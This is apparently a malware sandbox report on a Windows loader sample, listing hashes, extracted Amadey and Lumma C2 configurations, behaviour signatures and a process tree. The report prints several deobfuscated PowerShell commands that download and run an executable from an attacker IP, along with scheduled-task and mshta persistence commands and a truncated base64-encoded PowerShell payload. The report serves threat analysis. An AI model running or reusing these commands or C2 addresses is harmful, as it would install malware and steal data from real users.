Resubmissions

29/03/2025, 13:58 UTC

250329-q9152svvas 10

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2025, 13:58 UTC

General

  • Target

    2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fab7377d0c225be7110b381bbbe53d2e

  • SHA1

    3096dd62d5f3bcfaec2350e2e7484ddf4fea17b1

  • SHA256

    402dfdbcdac8266fdde22e6a8ecc3ad6fd795aaacda7620c4b6ecd615864dd88

  • SHA512

    89769c0cda927e2318ebf1b6b738040f4b723d05923194a515bdf406afd47845cd0f03e3828079bbcd4a81eabc20cd1a4ebce7b756987e0e49d31ae55c2714f5

  • SSDEEP

    24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0ku:sTvC/MTQYxsWR7a0k

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "MB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "OQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://advennture.top/GKsiio

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://targett.top/dsANGt

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 20 IoCs
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn hD273mattH6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\drXMVH8Pb.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn hD273mattH6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\drXMVH8Pb.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2616
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\drXMVH8Pb.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:332
        • C:\Users\Admin\AppData\Local\TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
          "C:\Users\Admin\AppData\Local\TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2700
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2500
            • C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
              "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1928
              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                PID:2300
                • C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe
                  "C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:760
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe"
                    9⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2176
                • C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe
                  "C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2836
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe"
                    9⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2140
            • C:\Users\Admin\AppData\Local\Temp\10369180101\6b651c8e26.exe
              "C:\Users\Admin\AppData\Local\Temp\10369180101\6b651c8e26.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:852
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn XbwH1maXJj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\tUnAPYA4f.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:740
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn XbwH1maXJj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\tUnAPYA4f.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2016
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\tUnAPYA4f.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1060
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1620
                  • C:\Users\Admin\AppData\Local\TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
                    "C:\Users\Admin\AppData\Local\TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2180
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2196
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2232
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1616
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2440
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:696
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1812
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2164
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2808
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "lcMkBmaJyYa" /tr "mshta \"C:\Temp\1CN4Qho3p.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2860
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\1CN4Qho3p.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2720
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:108
            • C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2100
            • C:\Users\Admin\AppData\Local\Temp\10369470101\e5466dd896.exe
              "C:\Users\Admin\AppData\Local\Temp\10369470101\e5466dd896.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2584
            • C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe
              "C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"
              6⤵
              • Executes dropped EXE
              PID:2712
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2712 -s 44
                7⤵
                • Loads dropped DLL
                PID:2260
            • C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe
              "C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"
              6⤵
              • Executes dropped EXE
              PID:2920
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2920 -s 44
                7⤵
                • Loads dropped DLL
                PID:836
            • C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe
              "C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"
              6⤵
              • Executes dropped EXE
              PID:2204
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2204 -s 28
                7⤵
                • Loads dropped DLL
                PID:2792
            • C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe
              "C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:1072
              • C:\Windows\SysWOW64\CMD.exe
                "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2752
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2448
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1820
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2800
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2728
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 418377
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:840
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Leon.cab
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1824
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "BEVERAGES" Compilation
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2784
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2316
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2476
                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                  Passwords.com N
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2788
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2312
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1600
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2012
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dm